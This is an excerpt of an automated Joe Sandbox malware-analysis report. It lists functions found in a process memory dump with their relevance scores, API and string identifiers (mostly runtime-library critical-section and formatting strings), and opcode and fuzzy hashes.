                                                                                                                    • Opcode ID: e6606d76a31c1dae36806b9dcb7b7668346c6da0da01e7d1b5b5174541bfce32
                                                                                                                    • Instruction ID: 0b6c30ede76576167bc7bcb73a3906de637264b3b7983fa8df390476da148b7b
                                                                                                                    • Opcode Fuzzy Hash: e6606d76a31c1dae36806b9dcb7b7668346c6da0da01e7d1b5b5174541bfce32
                                                                                                                    • Instruction Fuzzy Hash: 4A51FA35A003297EDF21EBA9DCC5FBD7BACBF04700F140099E505AB592E7719A458F51
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 0333B5EC Relevance: 9.0, APIs: 1, Strings: 4, Instructions: 238COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000004.00000002.3825638089.00000000032C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 032C0000, based on PE: true
                                                                                                                    • Associated: 00000004.00000002.3825638089.00000000033E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.3825638089.00000000033ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.3825638089.000000000345E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_4_2_32c0000_help.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: __aulldvrm
                                                                                                                    • String ID: +$-$0$0
                                                                                                                    • API String ID: 1302938615-699404926
                                                                                                                    • Opcode ID: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
                                                                                                                    • Instruction ID: 4a53dae5761be1c1190e508029d0be2c56c1c95ebe4d68c74354ad479929a0c0
                                                                                                                    • Opcode Fuzzy Hash: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
                                                                                                                    • Instruction Fuzzy Hash: 8F819D74E452499EDF24CE68C8D17FEFBA6EF46350F1CC25AE861AB391C73498418B60
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 033A20E0 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 84COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000004.00000002.3825638089.00000000032C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 032C0000, based on PE: true
                                                                                                                    • Associated: 00000004.00000002.3825638089.00000000033E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.3825638089.00000000033ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.3825638089.000000000345E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_4_2_32c0000_help.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: ___swprintf_l
                                                                                                                    • String ID: %%%u$[$]:%u
                                                                                                                    • API String ID: 48624451-2819853543
                                                                                                                    • Opcode ID: 3b64d5a6aa728cb7e6ee7266420b5a907588a7d19e159652c3e9b9d1748be9e7
                                                                                                                    • Instruction ID: 1eedeec70d662d25952c2d97d7d05942162b48945a5b84e17e12fb6a62a4b57b
                                                                                                                    • Opcode Fuzzy Hash: 3b64d5a6aa728cb7e6ee7266420b5a907588a7d19e159652c3e9b9d1748be9e7
                                                                                                                    • Instruction Fuzzy Hash: 2821627AE00619ABCB20DF79CC80AEFB7FCEF44640F480526E915E7200E734D9018BA1
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 0331F5B0 Relevance: 7.4, APIs: 1, Strings: 3, Instructions: 382COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Strings
                                                                                                                    • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 033602BD
                                                                                                                    • RTL: Re-Waiting, xrefs: 0336031E
                                                                                                                    • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 033602E7
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000004.00000002.3825638089.00000000032C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 032C0000, based on PE: true
                                                                                                                    • Associated: 00000004.00000002.3825638089.00000000033E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.3825638089.00000000033ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.3825638089.000000000345E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_4_2_32c0000_help.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u$RTL: Re-Waiting
                                                                                                                    • API String ID: 0-2474120054
                                                                                                                    • Opcode ID: 7443fa33b7abd5ef0678359395d9413d0ffcc5c63812f33d7d24c455f9a10331
                                                                                                                    • Instruction ID: 1fa568b02eaaafdd6c3e30c43d5f7c1de9085babba4baf03c439311be816b03d
                                                                                                                    • Opcode Fuzzy Hash: 7443fa33b7abd5ef0678359395d9413d0ffcc5c63812f33d7d24c455f9a10331
                                                                                                                    • Instruction Fuzzy Hash: 05E1CB356087419FD729CF28C8C5B2AB7E4BF88324F184A6DF4A68B6E0D774D854CB42
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 0332BED0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 129COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Strings
                                                                                                                    • RTL: Resource at %p, xrefs: 03367B8E
                                                                                                                    • RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 03367B7F
                                                                                                                    • RTL: Re-Waiting, xrefs: 03367BAC
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000004.00000002.3825638089.00000000032C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 032C0000, based on PE: true
                                                                                                                    • Associated: 00000004.00000002.3825638089.00000000033E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.3825638089.00000000033ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.3825638089.000000000345E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_4_2_32c0000_help.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                                                                                    • API String ID: 0-871070163
                                                                                                                    • Opcode ID: f126399c458ae2c39ed51bc85470eedf5316b929b9cffb803424f5de582b6235
                                                                                                                    • Instruction ID: a4d8b1913b2452cbcb254e4453ed978683a2d2bc762330f9abd784e2c4f2224e
                                                                                                                    • Opcode Fuzzy Hash: f126399c458ae2c39ed51bc85470eedf5316b929b9cffb803424f5de582b6235
                                                                                                                    • Instruction Fuzzy Hash: 8C41F335701702AFC724DE25CC80B6AFBE9EF89720F040A1DF85ADB680DB71E4458B91
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 0332B4C0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 121COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0336728C
                                                                                                                    Strings
                                                                                                                    • RTL: Resource at %p, xrefs: 033672A3
                                                                                                                    • RTL: Re-Waiting, xrefs: 033672C1
                                                                                                                    • RTL: Acquire Shared Sem Timeout %d(%I64u secs), xrefs: 03367294
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000004.00000002.3825638089.00000000032C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 032C0000, based on PE: true
                                                                                                                    • Associated: 00000004.00000002.3825638089.00000000033E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.3825638089.00000000033ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.3825638089.000000000345E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_4_2_32c0000_help.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                                                                    • String ID: RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                                                                                    • API String ID: 885266447-605551621
                                                                                                                    • Opcode ID: b86323a7a138bfd242cfce62048b56cdc5814714c7fed969e1f16ed9baae3665
                                                                                                                    • Instruction ID: 8c412d8158a04b171eb94f59a39787f816847882e2d72b50a3e8d75b8441e5df
                                                                                                                    • Opcode Fuzzy Hash: b86323a7a138bfd242cfce62048b56cdc5814714c7fed969e1f16ed9baae3665
                                                                                                                    • Instruction Fuzzy Hash: B741DF35A00316AFD720DE25CCC1B6ABBA9FF85714F144619F856AB680DB21F8868BD1
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 033A2300 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 90COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000004.00000002.3825638089.00000000032C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 032C0000, based on PE: true
                                                                                                                    • Associated: 00000004.00000002.3825638089.00000000033E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.3825638089.00000000033ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.3825638089.000000000345E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_4_2_32c0000_help.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: ___swprintf_l
                                                                                                                    • String ID: %%%u$]:%u
                                                                                                                    • API String ID: 48624451-3050659472
                                                                                                                    • Opcode ID: 32efc38ecf58047c9de66d138e4f0c5314210733d04f92c5d8f4d81509ada924
                                                                                                                    • Instruction ID: 2104f8015a5197e6c40ecfa9e929aa41e445689d8ed393cccf6dcbdbb11c05bb
                                                                                                                    • Opcode Fuzzy Hash: 32efc38ecf58047c9de66d138e4f0c5314210733d04f92c5d8f4d81509ada924
                                                                                                                    • Instruction Fuzzy Hash: 10317876A106199FCB20DF2DDC80BEFB7F8EF45610F444595E849E7240EB30AA448FA0
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 03337D61 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 284COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000004.00000002.3825638089.00000000032C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 032C0000, based on PE: true
                                                                                                                    • Associated: 00000004.00000002.3825638089.00000000033E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.3825638089.00000000033ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.3825638089.000000000345E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_4_2_32c0000_help.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: __aulldvrm
                                                                                                                    • String ID: +$-
                                                                                                                    • API String ID: 1302938615-2137968064
                                                                                                                    • Opcode ID: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
                                                                                                                    • Instruction ID: c34f90f43d67a947e11ebb68a16ffcec33cd378617268e50f2f60b1a1faf13c9
                                                                                                                    • Opcode Fuzzy Hash: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
                                                                                                                    • Instruction Fuzzy Hash: 6A91A4B4E0021A9BDF24DF69CCC16BEB7A5FF46720F18C61AE865EB2D0D73499418B50
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 032F9126 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 199COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000004.00000002.3825638089.00000000032C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 032C0000, based on PE: true
                                                                                                                    • Associated: 00000004.00000002.3825638089.00000000033E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.3825638089.00000000033ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.3825638089.000000000345E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_4_2_32c0000_help.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: $$@
                                                                                                                    • API String ID: 0-1194432280
                                                                                                                    • Opcode ID: 9c70b3a0cb768d9cd1a9f3836f855738cdfd1600e4be173ed3a8448e81f01e08
                                                                                                                    • Instruction ID: 83bf65b7bdace252110273ad936efd6269393044cacc470a01ed939adcc6a22a
                                                                                                                    • Opcode Fuzzy Hash: 9c70b3a0cb768d9cd1a9f3836f855738cdfd1600e4be173ed3a8448e81f01e08
                                                                                                                    • Instruction Fuzzy Hash: 3C811975D112699BDB35DF54CC84BEEB7B8AB08710F0445EAEA19B7280D7709E84CFA0
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 0337CEA0 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 134COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • @_EH4_CallFilterFunc@8.LIBCMT ref: 0337CFBD
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000004.00000002.3825638089.00000000032C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 032C0000, based on PE: true
                                                                                                                    • Associated: 00000004.00000002.3825638089.00000000033E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.3825638089.00000000033ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.3825638089.000000000345E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_4_2_32c0000_help.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: CallFilterFunc@8
                                                                                                                    • String ID: @$@4Qw@4Qw
                                                                                                                    • API String ID: 4062629308-2383119779
                                                                                                                    • Opcode ID: eac54be3ed0d380dc70b807ff7c1ea5a87e70484102b406c54bef10bdbb8bc91
                                                                                                                    • Instruction ID: f9ce3d01b8373f8a330010d0d3bfa14ce580f477af76411e170599db56ccd3a4
                                                                                                                    • Opcode Fuzzy Hash: eac54be3ed0d380dc70b807ff7c1ea5a87e70484102b406c54bef10bdbb8bc91
                                                                                                                    • Instruction Fuzzy Hash: 94415EB5D00224DFCB21DF99C8C0AAEBBB8EF45B10F04452AE955DF294D778D941CB61
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%